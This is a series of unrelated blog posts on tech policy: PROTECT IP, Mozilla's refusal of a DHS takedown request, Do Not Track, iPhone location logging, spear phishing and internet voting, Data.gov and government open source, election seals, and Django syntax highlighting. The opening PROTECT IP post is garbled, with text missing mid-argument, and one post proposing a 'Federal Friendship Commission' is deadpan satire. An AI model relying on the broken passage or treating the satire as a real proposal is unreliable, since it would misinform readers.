There's more than a hint of theatrics in the draft PROTECT IP bill (pdf, via dontcensortheinternet ) that has emerged as son-of-COICA, starting with the ungainly acronym of a name. Given its roots in the entertainment industry, that low drama comes as no surprise. Each section name is worse than the last: "Eliminating the Financial Incentive to Steal Intellectual Property Online" (Sec. 4) gives way to "Voluntary action for Taking Action Against Websites Stealing American Intellectual Property" (Sec. 5).
Techdirt gives a good overview of the bill, so I'll just pick some details:
diff
), replacing nondomestic domain with "domain" and permitting private plaintiffs -- "a holder of an intellectual property right harmed by the activities of an Internet site dedicated to infringing activities occurring on that Internet site." Oddly, the statute doesn't say the simpler "one whose rights are infringed," so the definition must be broader. Could a movie studio claim to be hurt by the infringement of others' rights, or MPAA enforce on behalf of all its members? Sec. 4 is missing (d)(2)(D) In short, rather than "protecting" intellectual and creative industry, this bill would make it less secure, giving the U.S. a competitive disadvantage in online business. (Sorry, Harlan, that we still can't debug the US Code as true code.)
Not satisfied with seizing domain names, the Department of Homeland Security asked Mozilla to take down the MafiaaFire add-on for Firefox. Mozilla, through its legal counsel Harvey Anderson, refused. Mozilla deserves thanks and credit for a principled stand for its users' rights.
MafiaaFire is a quick plugin, as its author describes, providing redirection service for a list of domains: "We plan to maintain a list of URLs, and their duplicate sites (for example Demoniod.com and Demoniod.de) and painlessly redirect you to the correct site." The service provides redundancy, so that domain resolution -- especially at a registry in the United States -- isn't a single point of failure between a website and its would-be visitors. After several rounds of ICE seizure of domain names on allegations of copyright infringement -- many of which have been questioned as to both procedural validity and effectiveness -- redundancy is a sensible precaution for site-owners who are well within the law as well as those pushing its limits.
DHS seemed poised to repeat those procedural errors here. As Mozilla's Anderson blogged: "Our approach is to comply with valid court orders, warrants, and legal mandates, but in this case there was no such court order." DHS simply "requested" the takedown with no such procedural back-up. Instead of pulling the add-on, Anderson responded with a set of questions, including:
- Have any courts determined that MAFIAAfire.com is unlawful or illegal inany way? If so, on what basis? (Please provide any relevant rulings)
- Have any courts determined that the seized domains related to MAFIAAfire.com are unlawful, illegal or liable for infringement in any way? (please provide relevant rulings)
- Is Mozilla legally obligated to disable the add-on or is this request based on other reasons? If other reasons, can you please specify.
Unless and until the government can explain its authority for takedown of code, Mozilla is right to resist DHS demands. Mozilla's hosting of add-ons, and the Firefox browser itself, facilitate speech. They, like they domain name system registries ICE targeted earlier, are sometimes intermediaries necessary to users' communication. While these private actors do not have First Amendment obligations toward us, their users, we rely on them to assert our rights (and we suffer when some, like Facebook are less vigilant guardians of speech).
As Congress continues to discuss the ill-considered COICA, it should take note of the problems domain takedowns are already causing. Kudos to Mozilla for bringing these latest errors to public attention -- and, as Tom Lowenthal suggests in the do-not-track context, standing up for its users.
cross-posted at Legal Tags
Last week, we hosted the W3C "Web Tracking and User Privacy" Workshop here at CITP (sponsored by Adobe, Yahoo!, Google, Mozilla and Microsoft). If you were not able to join us for this event, I hope to summarize some of the discussion embodied in the roughly 60 position papers submitted.
The workshop attracted a wide range of participants; the agenda included advocates, academics, government, start-ups and established industry players from various sectors. Despite the broad name of the workshop, the discussion centered around "Do Not Track" (DNT) technologies and policy, essentially ways of ensuring that people have control, to some degree, over web profiling and tracking.
Unfortunately, I'm going to have to expect that you are familiar with the various proposals before going much further, as the workshop position papers are necessarily short and assume familiarity. (If you are new to this area, the CDT's Alissa Cooper has a brief blog post from this past March, "Digging in on 'Do Not Track'", that mentions many of the discussion points. Technically, much of the discussion involved the mechanisms of the Mayer, Narayanan and Stamm IETF Internet-Draft from March and the Microsoft W3C member submission from February.)
Read on for more...
Technical Implementation: First, some quick background and updates: A number of papers point out how analogizing to a Do-Not-Call-like registry--I suppose where netizens would sign-up not to be tracked--would not work in the online tracking sense, so we should be careful not to shape the technology and policy too closely to Do-Not-Call. Having recognized that, the current technical proposals center around the Microsoft W3C submission and the Mayer et al. IETF submission, including some mix of a DNT HTTP header, a DNT DOM flag, and Tracking Protection Lists (TPLs). While the IETF submission focuses exclusively on the DNT HTTP Header, the W3C submission includes all three of these technologies. Browsers are moving pretty quickly here: Mozilla's FireFox v4.0 browser includes the DNT header, Microsoft's IE9 includes all three of these capabilities, Google's Chrome browser now allows extensions to send the DNT Header through the WebRequest API and Apple has announced that the next version of its Safari browser will support the DNT header.
Some of the papers critique certain aspects of the three implementation options while some suggest other mechanisms entirely. CITP's Harlan Yu includes an interesting discussion of the problems with DOM flag granularity and access control problems when third-party code included in a first-party site runs as if it were first-part code. Toubiana and Nissenbaum talk about a number of problems with the persistence of DNT exceptions (where a user opts back in) when a resource changes content or ownership and then go on to suggest profile-based opting-back-in based on a "topic" or grouping of websites. Avaya's submission has a fascinating discussion of the problems with implementation of DNT within enterprise environments, where tracking-like mechanisms are used to make sure people are doing their jobs across disparate enterprise web-services; Avaya proposes a clever solution where the browser first checks to see if it can reach a resource only available internally to the enterprise (virtual) network, in which case it ignores DNT preferences for enterprise software tracking mechanisms. A slew of submissions from Aquin et al., Azigo and PDECC favor a culture of "self-tracking", allowing and teaching people to know more about the digital traces they leave and giving them (or their agents) control over the use and release of their personal information. CASRO-ESOMAR and Apple have interesting discussions of gaming TPLs: CASRO-ESOMAR points out that a competitor could require a user to accept a TPL that blocks traffic from their competitors and Apple talks about spam-like DNS cycling as an example of an "arms race" response against TPLs.
Definitions: Many of the papers addressed definitions definitions definitions... mostly about what "tracking" means and what terms like "third-party" should mean. Many industry submissions such as Paypal, Adobe, SIIA, and Google urge caution so that good types of "tracking", such as analytics and forensics, are not swept under the rug and further argue that clear definitions of the terms involved in DNT is crucial to avoid disrupting user expectations, innovation and the online ecosystem. Paypal points out, as have others, that domain names are not good indicators of third-party (e.g., metrics.apple.com
is the Adobe Omniture service for apple.com
and fb.com
is equivalent to facebook.com
). Ashkan Soltani's submission distinguishes definitions for DNT that are a "do not use" conception vs. a "do not collect" conception and argues for a solution that "does not identify", requiring the removal of any unique identifiers associated with the data. Soltani points out how this has interesting measurement/enforcement properties as if a user sees a unique ID in the DNI case, the site is doing it wrong.
Enforcement: Some raised the issue of enforcement; Mozilla, for example, wants to make sure that there are reasonable enforcement mechanisms to deal with entities that ignore DNT mechanisms. On the other side, so to speak, are those calling for self-regulation such as Comcast and SIIA vs. those advocating for explicit regulation. The opinion polling research groups, CASRO-ESOMAR, call explicitly for regulation no matter what DNT mechanism is ultimately adopted, such that DNT headers requests are clearly enforced or that TPLs are regulated tightly so as to not over-block legitimate research activities. Abine wants a cooperative market mechanism that results in a "healthy market system that is responsive to consumer outcome metrics" and that incentivizes advertising companies to work with privacy solution providers to increase consumer awareness and transparency around online tracking. Many of the industry players worried about definitions are also worried about over-prescription from a regulatory perspective; e.g., Datran Media is concerned about over-prescription via regulation that might stifle innovation in new business models. Hoofnagle et al. are evaluating the effectiveness of self-regulation, and find that the self-regulation programs currently in existence are greatly stilted in favor of industry and do not adequately embody consumer conceptions of privacy and tracking.
Research: There were a number of submissions addressing research that is ongoing and/or further needed to gauge various aspects of the DNT puzzle. The submissions from McDonald and Wang et al. describe user studies focusing, respectively, on what consumers expect from DNT--spoiler: they expect no collection of their data--and gauging the usability and effectiveness of current opt-out tools. Both of these lines of work argue for usable mechanisms that communicate how developers implement/envision DNT and how users can best express their preferences via these tools. NIST's submission argues for empirical studies to set objective and usable standards for tracking protection and describes a current study of single sign-on (SSO) implementations. Thaw et al. discuss a proposal for incentivizing developers to communicate and design the various levels of rich data they need to perform certain kinds of ad targeting, and then uses a multi-arm bandit model to illustrate game-theoretic ad targeting that can be tweaked based on how much data they are allowed to collect. Finally, CASRO-ESOMAR makes a plea for exempting legitimate research purposes from DNT, so that opinion polling and academic research can avoid bias.
Transparency: A particularly fascinating thread of commentary to me was the extent to which submissions touched on or entirely focused on issues of transparency in tracking. Grossklags argues that DNT efforts will spark increased transparency but he's not sure that will overcome some common consumer privacy barriers they see in research. Seltzer talks about the intimate relationship between transparency and privacy and concludes that a DNT header is not very transparent--in operation, not use--while TPLs are more transparent in that they are a user-side mechanism that users can inspect, change and verify correct operation. Google argues that there is a need for transparency in "what data is collected and how it is used", leaving out the ability for users to effect or controls these things. In contrast, BlueKai also advocates for transparency in the sense of both accessing a user's profile and user "control" over the data it collects, but it doesn't and probably cannot extend this transparency to an understanding how BlueKai's clients use this data. Datran Media describes their PreferenceCentral tool which allows opting out of brands the user doesn't want targeting them (instead of ad networks, with which people are not familiar), which they argue is granular enough to avoid the "creepy" targeting feeling that users get from behavioral ads and also allow high-value targeted advertising. Evidon analogizes to physical world shopping transactions and concludes, smartly, "Anytime data that was not explicitly provided is explicitly used, there is a reflexive notion of privacy violation." and "A permanently affixed 'Not Me' sign is not a representation of an engaged, meaningful choice."
W3C vs. IETF: Finally, Mozilla seems to be the only submission that wrestles a bit with the "which standards-body?" question: W3C, IETF or some mix of both? They point out that the DNT Header is a broader issue than just web browsing so should be properly tackled by IETF where HTTP resides and the W3C effort could be focused on TPLs with a subcommittee for the DNT DOM element.
Finally, here are a bunch of submissions that don't fit into the above categories that caught my eye:
Soghoian talks about the quantity and quality of information needed for security, law enforcement and fraud prevention is usually so big as to risk making it the exception that swallows the rule. Soghoian further recommends a total kibosh on certain nefarious technologies such as browser fingerprinting.
Lowenthal makes the very good point that browser vendors need to get more serious about managing security and privacy vulnerabilities, as that kind of risk can be best dealt with in the choke-point of the browsers that users choose, rather than the myriad of possible web entities. This would allow browsers to compete on privacy in terms of how privacy preserving they can be.
Mayer argues for a "generative" approach to a privacy choice signaling technology, highlighting that language preferences (via short codes) and browsing platform (via user-agent strings) are now sent as preferences in web requests and web sites are free to respond as they see fit. A DNT signaling mechanism like this would allow for great flexibility in how a web service responded to a DNT request, for example serving a DNT version of the site/resource, prompting the user for their preferences or asking for a payment before serving.
Yahoo points out that DNT will take a while to make it into the majority of browsers that users are using. They suggest a hybrid approach using the DAA CLEAR ad notice for backwards compatibility for browsers that don't support DNT mechanisms and the DNT header for an opt-out that is persistent and enforceable.
Whew; I likely left out a lot of good stuff across the remaining submissions, but I hope that readers get an idea of some of the issues in play and can consult the submissions they find particularly interesting as this develops. We hope to have someone pen a "part 2" to this entry describing the discussion during the workshop and what the next steps in DNT will be.
This afternoon the CA Senate Judiciary Committee had a brief time for proponents and opponents of SB 761 to speak about CA's Do Not Track legislation. In general, the usual people said the usual things, with a few surprises along the way.
Surprise 1: repeated discussion of privacy as a Constitutional right. For those of us accustomed to privacy at the federal level, it was a good reminder that CA is a little different.
Surprise 2: TechNet compared limits on Internet tracking to Texas banning oil drilling, and claimed DNT is "not necessary" so legislation would be "particularly bad." Is Kleiner still heavily involved in the post-Wade TechNet?
Surprise 3: the Chamber of Commerce estimated that DNT legislation would cost $4 billion dollars in California, extrapolated from an MIT/Toronto study in the EU. Presumably they mean Goldfarb & Tucker's Privacy Regulation and Online Advertising, which is in my queue to read. Comments on donottrack.us raise concerns. Assuming even a generous opt-out rate of 5% of CA Internet users, $4B sounds high based on other estimates of value of entire clickstream data for $5/month. I look forward to reading their paper, and to learning the Chamber's methods of estimating CA based on Europe.
Surprise 4: hearing about the problems of a chilling effect -- for job growth, not for online use due to privacy concerns. Similarly, hearing frustrations about a text that says something "might" or "may" happen, with no idea what will actually transpire -- about the text of the bill, not about the text of privacy policies.
On a 3 to 2 vote, they sent the bill to the next phase: the Appropriations Committee. Today's vote was an interesting start.
Today, Pete Warden and Alasdair Allan revealed that Apple’s iPhone maintains an apparently indefinite log of its location history. To show the data available, they produced and demoed an application called iPhone Tracker for plotting these locations on a map. The application allows you to replay your movements, displaying your precise location at any point in time when you had your phone. Their open-source application works with the GSM (AT&T) version of the iPhone, but I added changes to their code that allow it to work with the CDMA (Verizon) version of the phone as well.
When you sync your iPhone with your computer, iTunes automatically creates a complete backup of the phone to your machine. This backup contains any new content, contacts, and applications that were modified or downloaded since your last sync. Beginning with iOS 4, this backup also included is a SQLite database containing tables named ‘CellLocation’, ‘CdmaCellLocaton’ and ‘WifiLocation’. These correspond to the GSM, CDMA and WiFi variants of location information. Each of these tables contains latitude and longitude data along with timestamps. These tables also contain additional fields that appear largely unused on the CDMA iPhone that I used for testing -- including altitude, speed, confidence, “HorizontalAccuracy,” and “VerticalAccuracy.”
Interestingly, the WifiLocation table contains the MAC address of each WiFi network node you have connected to, along with an estimated latitude/longitude. The WifiLocation table in our two-month old CDMA iPhone contains over 53,000 distinct MAC addresses, suggesting that this data is stored not just for networks your device connects to but for every network your phone was aware of (i.e. the network at the Starbucks you walked by -- but didn’t connect to).
Location information persists across devices, including upgrades from the iPhone 3GS to iPhone 4, which appears to be a function of the migration process. It is important to note that you must have physical access to the synced machine (i.e. your laptop) in order to access the synced location logs. Malicious code running on the iPhone presumably could also access this data.
Not only was it unclear that the iPhone is storing this data, but the rationale behind storing it remains a mystery. To the best of my knowledge, Apple has not disclosed that this type or quantity of information is being stored. Although Apple does not appear to be currently using this information, we’re curious about the rationale for storing it. In theory, Apple could combine WiFi MAC addresses and GPS locations, creating a highly accurate geolocation service.
The exact implications for mobile security (along with forensics and law enforcement) will be important to watch. What is most surprising is that this granularity of information is being stored at such a large scale on such a mainstream device.
Oak Ridge National Labs (one of the US national energy labs, along with Sandia, Livermore, Los Alamos, etc) had a bunch of people fall for a spear phishing attack (see articles in Computerworld and many other descriptions). For those not familiar with the term, spear phishing is sending targeted emails at specific recipients, designed to have them do an action (e.g., click on a link) that will install some form of software (e.g., to allow stealing information from their computers). This is distinct from spam, where the goal is primarily to get you to purchase pharmaceuticals, or maybe install software, but in any case is widespread and not targeted at particular victims. Spear phishing is the same technique used in the Google Aurora (and related) cases last year, the RSA case earlier this year, Epsilon a few weeks ago, and doubtless many others that we haven't heard about. Targets of spear phishing might be particular people within an organization (e.g., executives, or people on a particular project).
In this posting, I’m going to connect this attack to Internet voting (i-voting), by which I mean casting a ballot from the comfort of your home using your personal computer (i.e., not a dedicated machine in a precinct or government office). My contention is that in addition to all the other risks of i-voting, one of the problems is that people will click links targeted at them by political parties, and will try to cast their vote on fake web sites. The scenario is that operatives of the Orange party send messages to voters who belong to the Purple party claiming to be from the Purple party’s candidate for president and giving a link to a look-alike web site for i-voting, encouraging voters to cast their votes early. The goal of the Orange party is to either prevent Purple voters from voting at all, or to convince them that their vote has been cast and then use their credentials (i.e., username and password) to have software cast their vote for Orange candidates, without the voter ever knowing.
The percentage of users who fall prey to targeted attacks has been a subject of some controversy. While the percentage of users who click on spam emails has fallen significantly over the years as more people are aware of them (and as spam filtering has improved and mail programs have improved to no longer fetch images by default), spear phishing attacks have been assumed to be more effective. The result from Oak Ridge is one of the most significant pieces of hard data in that regard.
According to an article in The Register, of the 530 Oak Ridge employees who received the spear phishing email, 57 fell for the attack by clicking on a link (which silently installed software in their computers using to a security vulnerability in Internet Explorer which was patched earlier this week – but presumably the patch wasn’t installed yet on their computers). Oak Ridge employees are likely to be well-educated scientists (but not necessarily computer scientists) - and hence not representative of the population as a whole. The fact that this was a spear phishing attack means that it was probably targeted at people with access to sensitive information, whether administrative staff, senior scientists, or executives (but probably not the person running the cafeteria, for example). Whether the level of education and access to sensitive information makes them more or less likely to click on links is something for social scientists to assess – I’m going to take it as a data point and assume a range of 5% to 20% of victims will click on a link in a spear phishing attack (i.e., that it’s not off by more than a factor of two).
So as a working hypothesis based on this actual result, I propose that a spear phishing attack designed to draw voters to a fake web site to cast their votes will succeed with 5-20% of the targeted voters. With UOCAVA (military and overseas voters) representing around 5% of the electorate, I propose that a target of impacting 0.25% to 1% of the votes is not an unreasonable assumption. Now if we presume that the race is close and half of them would have voted for the "preferred" candidate anyway, this allows a spear phishing attack to capture an additional 0.12% to 0.50% of the vote.
If i-voting were to become more widespread – for example, to be available to any absentee voter – then these numbers double, because absentee voters are typically 10% of all voters. If i-voting becomes available to all voters, then we can guess that 5% to 20% of ALL votes can be coerced this way. At that point, we might as well give up elections, and go to coin tossing.
Considering the vast sums spent on advertising to influence voters, even for the very limited UOCAVA population, spear phishing seems like a very worthwhile investment for a candidate in a close race.
I’ve made various updates to my list of The Most Important Software Innovations. I’ve added Distributed Version Control System (DVCS); these are all over now in the form of git, Mercurial (hg), Bazaar, Monotone, and so on, but these were influenced by the earlier BitKeeper, which was in turn influenced by the earlier Teamware (developed by Sun starting in 1991). As is often the case, “new” innovations are actually much older than people realize. I also added make, originally developed in 1977, and quicksort, developed in 1960-1961 by C.A.R. (Tony) Hoare. I’ve also improved lots of material that was already there, such as a better description of the history of the remote procedure call (RPC).
So please enjoy The Most Important Software Innovations!
In its latest 2011 budget proposal, Congress makes deep cuts to the Electronic Government Fund. This fund supports the continued development and upkeep of several key open government websites, including Data.gov, USASpending.gov and the IT Dashboard. An earlier proposal would have cut the funding from $34 million to $2 million this year, although the current proposal would allocate $17 million to the fund.
Reports say that major cuts to the e-government fund would force OMB to shut down these transparency sites. This would strike a significant blow to the open government movement, and I think it’s important to emphasize exactly why shuttering a site like Data.gov would be so detrimental to transparency.
On its face, Data.gov is a useful catalog. It helps people find the datasets that government has made available to the public. But the catalog is really a convenience that doesn’t necessarily need to be provided by the government itself. Since the vast majority of datasets are hosted on individual agency servers—not directly by Data.gov—private developers could potentially replicate the catalog with only a small amount of effort. So even if Data.gov goes offline, nearly all of the data still exist online, and a private developer could go rebuild a version of the catalog, maybe with even better features and interfaces.
But Data.gov also plays a crucial behind the scenes role, setting standards for open data and helping individual departments and agencies live up to those standards. Data.gov establishes a standard, cross-agency process for publishing raw datasets. The program gives agencies clear guidance on the mechanics and requirements for releasing each new dataset online.
There’s a Data.gov manual that formally documents and teaches this process. Each agency has a lead Data.gov point-of-contact, who’s responsible for identifying publishable datasets and for ensuring that when data is published, it meets information quality guidelines. Each dataset needs to be published with a well-defined set of common metadata fields, so that it can be organized and searched. Moreover, thanks to Data.gov, all the data is funneled through at least five stages of intermediate review—including national security and privacy reviews—before final approval and publication. That process isn’t quick, but it does help ensure that key goals are satisfied.
When agency staff have data they want to publish, they use a special part of the Data.gov website, which outside users never see, called the Data Management System (DMS). This back-end administrative interface allows agency points-of-contact to efficiently coordinate publishing activities agency-wide, and it gives individual data stewards a way to easily upload, view and maintain their own datasets.
My main concern is that this invaluable but underappreciated infrastructure will be lost when IT systems are de-funded. The individual roles and responsibilities, the informal norms and pressures, and perhaps even the tacit authority to put new datasets online would likely also disappear. The loss of structure would probably mean that sharply reduced amounts of data will be put online in the future. The datasets that do get published in an ad hoc way would likely lack the uniformity and quality that the current process creates.
Releasing a new dataset online is already a difficult task for many agencies. While the current standards and processes may be far from perfect, Data.gov provides agencies with a firm footing on which they can base their transparency efforts. I don’t know how much funding is necessary to maintain these critical back-end processes, but whatever Congress decides, it should budget sufficient funds—and direct that they be used—to preserve these critically important tools.
I’ve been reading over an old court case and thinking about how it relates to the issue of government releasing free / libre / open source software (FLOSS). The case is Charles River Bridge v. Warren Bridge, 36 U.S. 420, including the final U.S. Supreme Court decision (United States Supreme Court reports, Vol. 9 (PDF page 773 on)). This is old; the decision was rendered in 1837. But I think it has interesting ramifications for today.
Any lawyer will correctly tell you that you must not look at one court decision to answer a specific question. And any lawyer will tell you that the details matter; a case with different facts may have a different ruling. Fine. I’m not a lawyer anyway, and I am not trying to create a formal legal opinion (this is a blog, not a legal opinion!). But still, it’s useful to look at these pivotal cases and try to think about their wider implications. I think we should all think about what’s good (or not good) for our communities, and how we should help our governments enable that; that is not a domain exclusive to lawyers.
So, what was this case all about? Wikipedia has a nice summary. Basically, in 1785 the Charles River Bridge Company was granted a charter to construct a bridge over the Charles River between Boston and Charleston. The bridge owners got quite wealthy from the bridge tolls, but the public was not so happy with having to keep paying and paying for such a key service. So Massachusetts allowed another company to build another bridge, the Warren bridge, next to the original Charles River bridge. What’s more, this second agreement stipulated that the Warren bridge would, after a certain time, be turned over to the state and be free for the public to use. The Charles River bridge owners were enraged — they knew that a free-to-use bridge would eliminate their profits. So they sued.
As noted in Wikipedia, the majority decision (read by Taney) was that any charter contract should be interpreted as narrowly as possible. Since the Charles River Bridge contract did not explicitly guarantee exclusive rights, the Supreme Court held that they didn’t get exclusive rights. The Supreme Court also determined that, in general, public grants should be interpreted closely and if there is ever any uncertainty in a contract, the decision made should be one to better the public. Taney said, “While the rights of private property are sacredly guarded, we must not forget that the community also have rights, and that the happiness and well-being of every citizen depends on their faithful preservation.” In his remarks, Taney also explored what the negative effects on the country would be if the Court had sided with the Charles River Bridge Company. He stated that had that been the decision of the Court, transportation would be affected around the whole country. Taney made the point that with the rise of technology, canals and railroads had started to take away business from highways, and if charters granted monopolies to corporations, then these sorts of transportation improvements would not be able to flourish. If this were the case then, Taney said, the country would “be thrown back to the improvements of the last century, and obliged to stand still.”
So how does this relate to FLOSS and government? Well first, let me set the stage, by pulling in a different strand of thought. The U.S. government pays to develop a lot of software. I think that in general, when “we the people” pay for software, then “we the people” should get it. The idea of paying for some software to be developed, and then giving long monopoly rights to a single company, seems to fly in the face of this. It doesn’t make sense from a cost viewpoint; when there’s a single monopoly supplier, the costs go up because there’s no effective competition! Some software shouldn’t be released to the public at all, but that is what classification and export controls are supposed to deal with. I’m sure there are exceptions, but currently we assume that when “we the people” pay to develop software, then “we the people” do not get the software, and that is absurd. If someone wants to have exclusive rights to some software, then he should spend all his time and money to develop it.
A fair retort to my argument is, “But does the government have the right to take an action that might put reduce the profits of a business, or put it out of business?” In particular, if the government paid to develop software, can the government release that software as FLOSS if a private company sells equivalent proprietary software? After all, that private company would suddenly find itself competing with a less-expensive or free product!
Examining all relevant legal cases about this topic (releasing FLOSS when there is an existing proprietary product) would be daunting; I don’t pretend to have done that analysis. (If someone has done it, please tell me!) However, I think Charles River Bridge v. Warren Bridge can at least shed some light and is interesting to think about. After all, this is a major Supreme Court decision, so the ruling should be able to help us think about the issue of the government enabling a free service that competes with an existing business. In this case, the government knowingly created a competing free service, and as a result an existing business would no longer be able to make money from something it did have rights to. There were a lot of people who had bought stock in the first company, for a lot of money, and those stock holders expected to reap massive returns from their monopoly on an important local service. There were also a lot of ordinary citizens who were unhappy about this local monopoly, and wanted to get rid of the monopoly. There is another interesting similarity between the bridge case and the release of FLOSS: the government did not try to take away the existing bridge, instead, they enabled the re-development of a competing bridge. While it’s not the last word, this case about bridges can (I think) help us think about whether governments can release FLOSS if there’s already a proprietary program that does the same thing.
I would certainly agree that governments shouldn’t perform an action with the sole or primary purpose of putting a company out of business. But when governments release FLOSS they usually are not trying to put a proprietary company out of business as their primary purpose. In the case of Charles River Bridge vs. Warren Bridge, the government took action not because it wanted to put a company out of business, but because it wanted to help the public (in this case, by reducing use costs for key infrastructure). At least in this case, the Supreme Court clearly decided that a government can do something even if it hurts the profitability of some business. If they had ruled otherwise, government would be completely hamstrung; almost all government actions help someone and harm someone else. The point should be that the government should be trying to aid the community as a whole.
I think a reasonable take-away message from this case is that government should focus on the rights, happiness, and well-being of the community as a whole, even if some specific group would make less money — and that helping the community may involve making some goods or services (like FLOSS!) available at no cost.
Over the last few weeks, I've described the chaotic attempts of the State of New Jersey to come up with tamper-indicating seals and a seal use protocol to secure its voting machines.
A seal use protocol can allow the seal user to gain some assurance that the sealed material has not been tampered with. But here is the critical problem with using seals in elections: Who is the seal user that needs this assurance? It is not just election officials: it is the citizenry.
Democratic elections present a uniquely difficult set of problems to be solved by a security protocol. In particular, the ballot box or voting machine contains votes that may throw the government out of office. Therefore, it's not just the government—that is, election officials—that need evidence that no tampering has occurred, it's the public and the candidates. The election officials (representing the government) have a conflict of interest; corrupt election officials may hire corrupt seal inspectors, or deliberately hire incompetent inspectors, or deliberately fail to train them. Even if the public officials who run the elections are not at all corrupt, the democratic process requires sufficient transparency that the public (and the losing candidates) can be convinced that the process was fair.
In the late 19th century, after widespread, pervasive, and long-lasting fraud by election officials, democracies such as Australia and the United States implemented election protocols in an attempt to solve this problem. The struggle to achieve fair elections lasted for decades and was hard-fought.
A typical 1890s solution works as follows: At the beginning of election day, in the polling place, the ballot box is opened so that representatives of all political parties can see for themselves that it is empty (and does not contain hidden compartments). Then the ballot box is closed, and voting begins. The witnesses from all parties remain near the ballot box all day, so they can see that no one opens it and no one stuffs it. The box has a mechanism that rings a bell whenever a ballot is inserted, to alert the witnesses. At the close of the polls, the ballot box is opened, and the ballots are counted in the presence of witnesses.
In principle, then, there is no single person or entity that needs to be trusted: the parties watch each other.
Democratic elections pose difficult problems not just for security protocols in general, but for seal use protocols in particular. Consider the use of tamper-evident security seals in an election where a ballot box is to be protected by seals while it is transported and stored by election officials out of the sight of witnesses. A good protocol for the use of seals requires that seals be chosen with care and deliberation, and that inspectors have substantial and lengthy training on each kind of seal they are supposed to inspect. Without trained inspectors, it is all too easy for an attacker to remove and replace the seal without likelihood of detection.
Consider an audit or recount of a ballot box, days or weeks after an election. It reappears to the presence of witnesses from the political parties from its custody in the hands of election officials. The tamper evident seals are inspected and removed—but by whom?
If elections are to be conducted by the same principles of transparency established over a century ago, the rationale for the selection of particular security seals must be made transparent to the public, to the candidates, and to the political parties. Witnesses from the parties and from the public must be able to receive training on detection of tampering of those particular seals. There must be (the possibility of) public debate and discussion over the effectiveness of these physical security protocols.
It is not clear that this is practical. To my knowledge, such transparency in seal use protocols has never been attempted.
Bibliographic citation for the research paper behind this whole series of posts:
Security Seals On Voting Machines: A Case Study, by Andrew W. Appel. Accepted for publication, ACM Transactions on Information and System Security (TISSEC), 2011.
Now that the FCC has finally acted to safeguard network neutrality, the time has come to take the next step toward creating a level playing field on the rest of the Information Superhighway. Network neutrality rules are designed to ensure that large telecommunications companies do not squelch free speech and online innovation. However, it is increasingly evident that broadband companies are not the only threat to the open Internet. In short, federal regulators need to act now to safeguard social network neutrality.
The time to examine this issue could not be better. Facebook is the dominant social network in countries other than Brazil, where everybody uses Friendster or something. Facebook has achieved near-monopoly status in the social networking market. It now dominates the web, permeating all aspects of the information landscape. More than 2.5 million websites have integrated with Facebook. Indeed, there is evidence that people are turning to social networks instead of faceless search engines for many types of queries.
Social networks will soon be the primary gatekeepers standing between average Internet users and the web’s promise of information utopia. But can we trust them with this new-found power? Friends are unlikely to be an unbiased or complete source of information on most topics, creating silos of ignorance among the disparate components of the social graph. Meanwhile, social networks will have the power to make or break Internet businesses built atop the enormous quantity of referral traffic they will be able to generate. What will become of these businesses when friendships and tastes change? For example, there is recent evidence that social networks are hastening the decline of the music industry by promoting unknown artists who provide their music and streaming videos for free.
Social network usage patterns reflect deep divisions of race and class. Unregulated social networks could rapidly become virtual gated communities, with users cut off from others who could provide them with a diversity of perspectives. Right now, there’s no regulation of the immense decision-influencing power that friends have, and there are no measures in place to ensure that friends provide a neutral and balanced set of viewpoints. Fortunately, policy-makers have a rare opportunity to preempt the dangerous consequences of leaving this new technology to develop unchecked.
The time has come to create a Federal Friendship Commission to ensure that the immense power of social networks is not abused. For example, social network users who have their friend requests denied currently have no legal recourse. Users should have the option to appeal friend rejections to the FFC to verify that they don’t violate social network neutrality. Unregulated social networks will give many users a distorted view of the world dominated by the partisan, religious, and cultural prejudices of their immediate neighbors in the social graph. The FFC can correct this by requiring social networks to give equal time to any biased wall post.
However, others have suggested lighter-touch regulation, simply requiring each person to have friends of many races, religions, and political persuasions. Still others have suggested allowing information harms to be remedied through direct litigation—perhaps via tort reform that recognizes a new private right of action against violations of the “duty to friend.” As social networking software will soon be found throughout all aspects of society, urgent intervention is needed to forestall “The Tyranny of The Farmville.”
Of course, social network neutrality is just one of the policy tools regulators should use to ensure a level playing field. For example, the Department of Justice may need to more aggressively employ its antitrust powers to combat the recent dangerous concentration of social networking market share on popular micro-blogging services. But enacting formal social network neutrality rules is an important first step towards a more open web.
Last week Mashable featured a post asking if location-based services are all just hype. Continuing the geolocation theme Mashable has a new post, What the Future Holds for the Checkin, by a guest blogger/columnist. I have a reservations about how well this article delves into future opportunities, so I just toss a few out here.
I find Markdown to be a more readable and usable alternative to XHTML/CSS for formatting text, and I use it to format my articles at this Django-powered blog. When implementing syntax highlighting for code blocks within text, I searched for existing solutions and found many approaches that were too complicated and had shortcomings. After more research, I realized that syntax highlighting works out of the box in Django if you have a recent version of Markdown.
Here are the required steps to enable syntax highlighting in your Django application. First, install python-markdown version 2.0+ and python-pygments. Pygments is a syntax highlighter written in Python. Markdown 2.0+ has an extension system and comes with a syntax highlighting extension that uses Pygments. This extension is called CodeHilite. To use it, add the following to a Django template:
{% load markup %} {{ text|markdown:'codehilite' }}
Next, you need to create a stylesheet that defines colors for syntax highlighting. To do so, run the following command:
$ pygmentize -S default -f html -a .codehilite > code.css
Include code.css
in your template.
Now, to create a syntax-highlighted code block, indent the block by 4 spaces and declare the language of the block at the first line, prefixed by :::
(3 colons). This is better explained by example. The following text:
:::python print 'Hello, World.'
Produces the following syntax-highlighted code block:
print 'Hello, World.'
Keep in mind that Markdown allows embedded HTML elements by default. You shouldn't enable this if the source of the text is untrusted. To disable HTML elements, use the following in your Django template instead:
{% load markup %} {{ text|markdown:'safe,codehilite' }}
Pygments supports a long list of languages and styles. Be sure to check the demos too.
I've been meaning to migrate my website from Drupal to Django for a very long time. Although Drupal is an excellent content management system, I got tired of working with PHP every time I wanted to add a feature or make a change. My previous web host didn't support Python so I had to stick with PHP. Recently however, I moved the website to a VPS at Linode and decided to migrate to Django as well.
Writing a blog application in Django took very little time thanks to the reusable apps that come with Django, like syndication, comments and admin. I also had to port the blog design to Django templates and migrate the content from HTML to Markdown. I've been using Markdown at StackOverflow and I really like it. It's concise, readable and much easier to work with in a text editor than HTML. I wrote a small script to convert existing articles from the subset of HTML that I was using to Markdown.
